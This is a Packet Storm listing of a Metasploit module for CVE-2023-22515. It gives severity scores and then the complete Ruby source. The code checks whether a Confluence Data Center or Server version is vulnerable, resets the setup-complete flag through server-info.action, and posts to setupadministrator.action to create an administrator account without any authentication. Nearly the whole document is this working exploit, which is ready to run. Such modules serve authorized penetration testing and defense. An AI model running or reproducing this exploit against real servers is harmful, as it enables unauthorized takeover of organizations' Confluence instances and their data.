Atlassian Confluence Data Center And Server Authentication Bypass Via Broken Access Control

2024-08-3100:00:00

temp66, Emir Polat, metasploit.com

packetstormsecurity.com

atlassian

confluence

data center

server

authentication bypass

broken access control

vulnerability

exploit

admin account

request

target

specially crafted

metasploit module

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.2

Confidence

Low

EPSS

0.973

Percentile

99.9%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',  
'Description' => %q{  
This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.  
A specially crafted request can be create new admin account without authentication on the target Atlassian server.  
},  
'Author' => [  
'Unknown', # exploited in the wild  
'Emir Polat' # metasploit module  
],  
'References' => [  
['CVE', '2023-22515'],  
['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],  
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],  
['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']  
],  
'DisclosureDate' => '2023-10-04',  
'DefaultOptions' => {  
'RPORT' => 8090  
},  
'License' => MSF_LICENSE,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/']),  
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),  
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),  
OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/login.action')  
)  
return Exploit::CheckCode::Unknown unless res  
return Exploit::CheckCode::Safe unless res.code == 200  
  
poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text  
return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/  
  
confluence_version = Rex::Version.new(Regexp.last_match(1))  
  
vprint_status("Detected Confluence version: #{confluence_version}")  
  
if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||  
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||  
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))  
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")  
end  
  
Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")  
end  
  
def run  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/server-info.action'),  
'vars_get' => {  
'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'  
}  
)  
  
return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200  
  
print_good('Found server-info.action! Trying to ignore setup.')  
  
created_user = create_admin_user  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),  
'headers' => {  
'X-Atlassian-Token' => 'no-check'  
}  
)  
  
return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user  
  
print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200  
  
create_credential({  
workspace_id: myworkspace_id,  
origin_type: :service,  
module_fullname: fullname,  
username: datastore['NEW_USERNAME'],  
private_type: :password,  
private_data: datastore['NEW_PASSWORD'],  
service_name: 'Atlassian Confluence',  
address: datastore['RHOST'],  
port: datastore['RPORT'],  
protocol: 'tcp',  
status: Metasploit::Model::Login::Status::UNTRIED  
})  
  
print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")  
print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")  
end  
  
def create_admin_user  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),  
'headers' => {  
'X-Atlassian-Token' => 'no-check'  
},  
'vars_post' => {  
'username' => datastore['NEW_USERNAME'],  
'fullName' => 'New Admin',  
'email' => datastore['NEW_EMAIL'],  
'password' => datastore['NEW_PASSWORD'],  
'confirm' => datastore['NEW_PASSWORD'],  
'setup-next-button' => 'Next'  
}  
)  
res&.code == 302  
end  
end  
`